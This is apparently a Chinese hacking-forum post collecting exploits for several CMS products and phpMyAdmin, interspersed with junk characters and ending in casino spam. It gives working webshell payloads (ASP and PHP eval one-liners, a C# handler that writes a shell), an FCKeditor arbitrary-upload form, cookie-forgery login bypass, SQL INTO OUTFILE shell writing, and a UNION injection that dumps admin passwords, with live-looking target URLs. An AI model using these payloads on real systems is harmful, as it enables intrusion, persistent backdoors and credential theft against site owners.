登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/
L/ D5 J6 ?6 \9 g7 p/ k, Z- X
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
d4 a3 F% q! a1 R
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
7 g# n* B# M$ v6 H( A# `
5 }0 z+ n! d8 f1 x
YxShop易想购物商城4.7.1版本任意文件上传漏洞
& \3 R e& f( q% R
0 G# t) I) g5 }. F) w( ~1 g
http://xxoo.com/controls/fckedit
... aspx/connector.aspx
; h2 n( E( |& R3 e# d3 |/ ?/ o) T
跳转到网站根目录上传任意文件。
2 b" \' b- t7 e9 P
如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
9 k" ?+ R0 D) T! q& S
<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
- I n$ j2 J) s
Upload a new file:<br>
1 z5 j' `6 H" ?" K7 e w
<input type="file" name="NewFile" size="50"><br>
- B3 q$ {; ^5 b, n5 g- x4 l$ F: P: ]
<input id="btnUpload" type="submit" value="Upload">
3 @8 V7 j5 ?& a$ l
</form>
% G3 E# V8 Q7 ^4 J3 g
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 l* L0 U0 y& H+ K& l( j
9 `! F: F/ n* }0 {, P) d% n% L
SDcms 后台拿webshell
" v/ y: r7 f) `
! @/ X$ ~" v+ e% D
第一种方法:
5 Y: u7 c: D8 x3 k1 b; h" M
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
9 m2 `8 H3 F: e/ J# W R; S
把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
3 `; z6 `' |( m c, F% H
用菜刀链接
http://www.xxx.com/inc/const.asp
就搞定了。
" h9 _0 [6 \( w3 Z7 ~$ U8 ?4 t _ |/ a
第二种方法:
' H9 a ?: ` j& O0 U( M
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
" [6 Z. F/ H9 Z$ E2 v2 m, w
在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!
8 u; t# ~9 i: U; d5 ?/ q4 _* ?
第三种方法:
& W5 N4 R7 v- ^, D0 _( z- _6 x" K
进入后台-->界面管理-->模板文件管理-->创建文件
0 M. ]# A2 J7 C% Z6 `" f
文件名写入getshell.ashx
( \4 b$ H ~1 W% x# c" \
内容写入下面内容:
; o3 ^5 P4 P7 \) P* J) V
/====================复制下面的=========================/
. a) P% S" g Z S9 v/ D
<%@ WebHandler Language="C#" Class="Handler" %>
3 G% q; u, I; a" y$ ?' o' h Q
using System;
5 {' t+ O$ U% J
using System.Web;
1 g, g, D$ z* P( j
using System.IO;
6 c7 G# r R0 S) P* O8 ?+ W4 w
public class Handler : IHttpHandler {
4 N% T4 \; |' B3 C. A
public void ProcessRequest (HttpContext context) {
$ `# |& d/ X" m- R4 x
context.Response.ContentType = "text/plain";
& A5 n# @! R; _' X. c9 y. S
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
$ ?/ m; g6 Q# M f2 R" V; b
file1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
1 }( }( B+ b$ O1 J+ c6 F {2 i X
file1.Flush();
" {1 V/ S$ l2 |6 h3 I' z& c
file1.Close();
5 @* }' l! r& C, m: `" C* O
}
! i+ Y% F( l0 W/ {) b0 O! g
public bool IsReusable {
3 V9 W# v. U5 d* A. \' m
get {
' |2 s, Q* B" ?3 Z9 a$ t; n
return false;
, U0 f5 p( y! @9 k7 R
}
, t* _$ ]" P8 G0 M
}
* R& a- C8 R/ D& W" k
}
* j$ `& l `" f0 f! `/ }
/=============================================/
6 P5 @) g0 h7 ^& |# b, [
访问这个地址:
http://www.xxx.com/skins/2009/getshell.ashx
$ Y; i, G- {) r' j$ y$ B; U% q
会在
http://www.xxx.com/skins/2009/
目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接
7 u3 [, Z5 k1 q7 W8 k3 |
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
) _, l# [( E% \0 J6 z5 }, F
4 @. z* Z# W5 Z5 G7 g# U
ESCMS网站管理系统0day
2 q3 B! G1 _( I9 J7 _
u& d& W# c6 m+ @7 S9 o
后台登陆验证是通过admin/check.asp实现的
1 m/ a7 b7 m0 N& @- A6 G1 _: f" ~
+ D, G( \0 m2 ]6 |
首先我们打开
http://target.com/admin/es_index.html
. O! b# P! |9 q5 b5 U3 b' O) |$ M U
然后在COOKIE结尾加上
5 N4 |0 i5 ?$ _# }
; ESCMS$_SP2=ES_admin=st0p;
$ O' M# q% c& @# z# o1 b4 @% J" {5 S L
修改,然后刷新
' g7 h% o6 h1 J
进后台了嘎..
% e. s0 K' w1 Y( \( i' H C& W
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
* S9 p4 C+ h; T
2 v; j; n8 ~! }, Z! M; i
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
4 `1 `1 v8 o4 V" c9 ]
嘿嘿,成功了,shell地址为
http://target.com/admin/diy.asp
4 \( A0 \4 t1 G k, T8 c2 v) H# \
存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败..
) U/ d w4 ^$ \! N. }, ?$ G8 `
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了
! a- u+ D$ X" d
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% w. t4 z7 e. V: b
: z7 S: ?1 @, o; r, N1 X4 o
宁志网站管理系统后台无验证漏洞及修复
3 \8 ^1 k6 j. P- l) d
% D' W1 }$ ^" `% j9 G2 s7 s! a, r
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
4 U X* _" ~- ~+ B3 z
官方网站:
www.ningzhi.net
9 H- F& d) q% k& |' F0 O* w
学校网站管理系统 V.2011版本
$ ^$ I( I% Y* Y
http://down.chinaz.com/soft/29943.htm
) y2 ]9 S3 j6 Q% N
其它版本(如:政府版等),自行下载.
; a, r* f+ _9 P4 d5 [
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~
3 U; v( {$ i1 d2 `9 a+ o
login.asp代码如下:
1 ?5 y M& H9 y- h" x
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
/ Y! W. z1 i: @
manage.asp代码我就不帖出来了.反正也没验证.
: F& r- O: y c0 Q! ]5 p1 r. Y
只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
2 o* P! @9 S* o3 g& }& n4 r, c
漏洞利用:
. y2 C# T# z5 d0 Z
直接访问
http://www.0855.tv/admin/manage.asp
/ I5 ^( n9 `( R% ?: b" D
数据库操作:
http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
7 J: Z8 a$ C8 O u- f6 D, H
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ S% y* K8 v" q. U. V
! Q; M3 h, n* w. F- V& ^2 X
phpmyadmin拿shell的四种方法总结及修复
4 V( m w4 U, n6 F' {
& {5 t2 _' h- \* z! u
方法一:
t* A, F) }0 M6 T o* J
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
0 O* S( Z% P7 C- ~) \! g+ G9 N
INSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');
; o1 k' R6 {. G, U, a' O# r
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';
; w0 v: N4 s' Z/ _3 t5 |4 @& S
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php
+ T7 o; `, |7 @7 F! b- F( F" i
一句话连接密码:7on
$ i- y. h" u' K/ u' p. x2 k
方法二:
- B, J' u' v' Q! t
读取文件内容: select load_file('E:/xamp/www/s.php');
/ K. o y6 v/ B9 A! \8 `5 H. C) K
写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
* y; T( z0 B& G; z
cmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
3 x4 ^" n# k) K2 o
方法三:
$ C# A' W% O1 G) J( S: W+ t
JhackJ版本 PHPmyadmin拿shell
. F4 ?, i" G( k# P% P" X; a
Create TABLE study (cmd text NOT NULL);
6 b! M8 Q! A1 R
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');
- d' O) c8 w z; f5 w+ l- m. K% D
select cmd from study into outfile 'E:/wamp/www/7.php';
) H* \* P7 p( S) c0 }9 h' i1 n
Drop TABLE IF EXISTS study;
9 {; @. j1 _5 [9 {2 [1 D0 d4 y
<?php eval($_POST[cmd])?>
$ M; [$ R2 U& a: ~' J
CREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
2 [" k6 S3 a* S! b- o1 q; D
INSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1
{- V* L2 _' `3 G; h3 b
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 1
6 t* g. V! ]4 A8 c
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。
0 x3 i; I. ~- n) Q
方法四:
8 j9 G5 c5 n+ V1 O9 h1 m6 i
select load_file('E:/xamp/www/study.php');
% h% T2 e8 V' M/ U' m
select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'
# L) L8 S1 d3 r) k
然后访问网站目录:
http://www.2cto.com/study.php?cmd=dir
2 R8 O9 Q# _( n- f' \/ r
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
, f6 B5 N7 [4 E5 r
6 Y D9 R: Z/ U+ {: O8 ]
NO.001中学网站管理系统 Build 110628 注入漏洞
; J1 n6 s2 K% g; O, F
. |2 I) T2 Z) R& `$ o* ] g
NO.001中学网站管理系统功能模块:
7 ]4 D% d) T0 D& U9 g
1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等
* x# d- ~9 c7 ~- i- ]" K
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息
, s5 e/ f& S3 ?/ B; ]. I( N
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息
7 \% D4 \% d8 l3 s( n8 M
4.视频图片管理:一级分类,动态添加视频或者图片等信息
: g5 n$ @/ H+ s( r, @% B8 s% W
5.留言管理:对留言,修改,删除、回复等管理
( F, d, m* @. e; L" C* l
6.校友频道:包括校友资料excel导出、管理等功能
- r8 U0 [) N- j6 v* I7 _
7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页
* w# m* _; m: t: g& ` X- T" M
默认后台:admin/login.asp
) F, R0 K7 E) |% \5 t W0 O) y0 T
官方演示:
http://demo.001cms.net
_* T0 H& \0 }
源码下载地址:
http://down.chinaz.com/soft/30187.htm
5 i/ h t6 n( N c3 s0 R( M0 S) y
EXP:
0 w6 _/ Y" R2 q- D8 Q6 n
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
& q! a+ ]0 p, P6 a
测试:
http://demo.001cms.net/shownews.asp?type=
新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
1 R" h5 q& Y) G6 Z6 Z
getshell:后台有备份,你懂的
@& Z, u/ G: N( c' W+ M, e* c
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
: V6 C7 @! H# z8 h% c
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
作者:
匿名
时间:
2017-10-28 08:21
casino slots
online casino canada
new online casino
slot machines
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2